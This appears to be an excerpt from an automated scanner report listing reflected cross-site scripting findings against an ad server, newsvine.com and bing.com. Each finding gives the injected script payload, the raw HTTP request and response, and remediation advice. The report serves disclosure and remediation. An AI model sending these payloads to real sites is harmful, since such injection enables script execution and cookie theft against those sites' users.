<html><head><title>FreePhone_TestEvergreen_160x600_011811</title> <meta HTTP-EQUIV="expires" CONTENT="0"></meta> <meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta> </head><body style="border-widt ...[SNIP]... e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1) { bIsRightVersion = (2 >= nRequiredVersion); } } } detectPluginCIN1295373277700(); var _CIN1295373277700_Instance = { click : "462ea</script><script>alert(1)</script>69e81c4a77c", clickThruUrl: "http://clk.redcated/go/287065754/direct;pc.106032482;wi.160;hi.600;ai.199704563;ct.$num$/01/", imgs : [] }; if (!window.armapi_a1_a1) { var armapi_a1_a1 = { initialize : func ...[SNIP]...
The value of the pc.106032482;wi.160;hi.600/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d434b'-alert(1)-'d9aa05425d9 was submitted in the pc.106032482;wi.160;hi.600/01?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=d434b'-alert(1)-'d9aa05425d9 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6870 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:34:48 GMT
5.277. http://redcated/CNT/iview/299297287/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/CNT/iview/299297287/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e8ca"><script>alert(1)</script>65ba48f2cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /CNT/iview/299297287/direct;pc.106028736;wi.300;hi.120/01?click=&3e8ca"><script>alert(1)</script>65ba48f2cfe=1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://www.redacted/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: redcated Proxy-Connection: Keep-Alive Cookie: MUID=AD04D6F8B2FF44629973BD0674351135
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 307 Content-Type: text/html Expires: 0 P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296344800-3941560; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Sat, 29 Jan 2011 23:46:39 GMT
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17047'%3bd5b850e643 was submitted in the REST URL parameter 4. This input was echoed as 17047';d5b850e643 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /DEN/jview/286026710/direct17047'%3bd5b850e643 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6620 Content-Type: text/javascript Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:22:35 GMT Connection: close
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70d95'-alert(1)-'4fb7f8f1dba was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /DEN/jview/286026710/direct;;vt.1/01?buster_url=&pub_view_url=&click=70d95'-alert(1)-'4fb7f8f1dba HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6546 Content-Type: text/javascript Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:34:51 GMT
5.280. http://redcated/DEN/jview/286026710/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/DEN/jview/286026710/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7580e"-alert(1)-"89273f46f38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /DEN/jview/286026710/direct;;vt.1/01?buster_url=&pub_view_url=&click=&7580e"-alert(1)-"89273f46f38=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 5866 Content-Type: text/javascript Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:35:01 GMT
if (!window.armapi_a1_a1) { var armapi_a1_a1 = { initialize : function(u ...[SNIP]...
5.281. http://redcated/DEN/jview/286026710/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/DEN/jview/286026710/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6b28'-alert(1)-'25084a46f21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /DEN/jview/286026710/direct;;vt.1/01?buster_url=&pub_view_url=&click=&f6b28'-alert(1)-'25084a46f21=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6573 Content-Type: text/javascript Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:35:03 GMT
The value of the ;wi.300;hi.250/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1215c</script><script>alert(1)</script>cfe86179be9 was submitted in the ;wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=1215c</script><script>alert(1)</script>cfe86179be9 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6482 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 15:04:38 GMT
The value of the ;wi.300;hi.250/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cda0a'-alert(1)-'bb646d27c0c was submitted in the ;wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=cda0a'-alert(1)-'bb646d27c0c HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6706 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 15:04:40 GMT
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d623e'%3b444294c40e was submitted in the REST URL parameter 4. This input was echoed as d623e';444294c40e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/264935949/directd623e'%3b444294c40e;;wi.300;hi.250/01?click= HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6382 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 15:05:06 GMT
5.285. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/NYC/iview/264935949/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54cc3"-alert(1)-"5d7a2901fc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=&54cc3"-alert(1)-"5d7a2901fc7=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6394 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 15:04:49 GMT
5.286. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/NYC/iview/264935949/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97af1"><script>alert(1)</script>8e072145e04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=&97af1"><script>alert(1)</script>8e072145e04=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6459 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 15:04:47 GMT
5.287. http://redcated/NYC/iview/264935949/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/NYC/iview/264935949/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d20a'-alert(1)-'4fe7bcd4f48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click=&5d20a'-alert(1)-'4fe7bcd4f48=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6721 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 15:04:51 GMT
The value of the wi.1;hi.1/01?relocate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11f28'-alert(1)-'ecdf65e1367 was submitted in the wi.1;hi.1/01?relocate parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /PTR/jview/240321567/direct;wi.1;hi.1/01?relocate=http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link11f28'-alert(1)-'ecdf65e1367 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 420 Content-Type: text/javascript Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:34:39 GMT
The value of the /01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dec58</script><script>alert(1)</script>71466742f94 was submitted in the /01?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ULA/iview/296652509/direct;/01?click=dec58</script><script>alert(1)</script>71466742f94 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6410 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:34:47 GMT
The value of the /01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17000'-alert(1)-'f899d3d5d6a was submitted in the /01?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ULA/iview/296652509/direct;/01?click=17000'-alert(1)-'f899d3d5d6a HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6300 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:34:48 GMT
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9618f'%3b93d1eb33974 was submitted in the REST URL parameter 4. This input was echoed as 9618f';93d1eb33974 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ULA/iview/296652509/direct9618f'%3b93d1eb33974 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6322 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:22:34 GMT Connection: close
5.292. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/ULA/iview/296652509/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b87a3"><script>alert(1)</script>91400ea4a5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ULA/iview/296652509/direct;/01?click=&b87a3"><script>alert(1)</script>91400ea4a5a=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6390 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:34:56 GMT
5.293. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/ULA/iview/296652509/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f8f'-alert(1)-'1d3891b1941 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ULA/iview/296652509/direct;/01?click=&d5f8f'-alert(1)-'1d3891b1941=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6315 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:35:02 GMT
5.294. http://redcated/ULA/iview/296652509/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/ULA/iview/296652509/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d075"-alert(1)-"276dcba3107 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ULA/iview/296652509/direct;/01?click=&5d075"-alert(1)-"276dcba3107=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6315 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:34:57 GMT
5.295. http://wbenedetti.newsvine.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://wbenedetti.newsvine.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2efa1"-alert(1)-"fb67b00e4a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2efa1"-alert(1)-"fb67b00e4a1=1 HTTP/1.1 Host: wbenedetti.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:05:22 GMT Server: Apache/2.2.14 (Debian) Vary: negotiate TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=45f73cc22cc66ac775a363e022c73cd5; expires=Sat, 25-Jan-2031 03:05:22 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 80845
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d9b0'-alert(1)-'2db30f3531a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /local/4d9b0'-alert(1)-'2db30f3531a HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
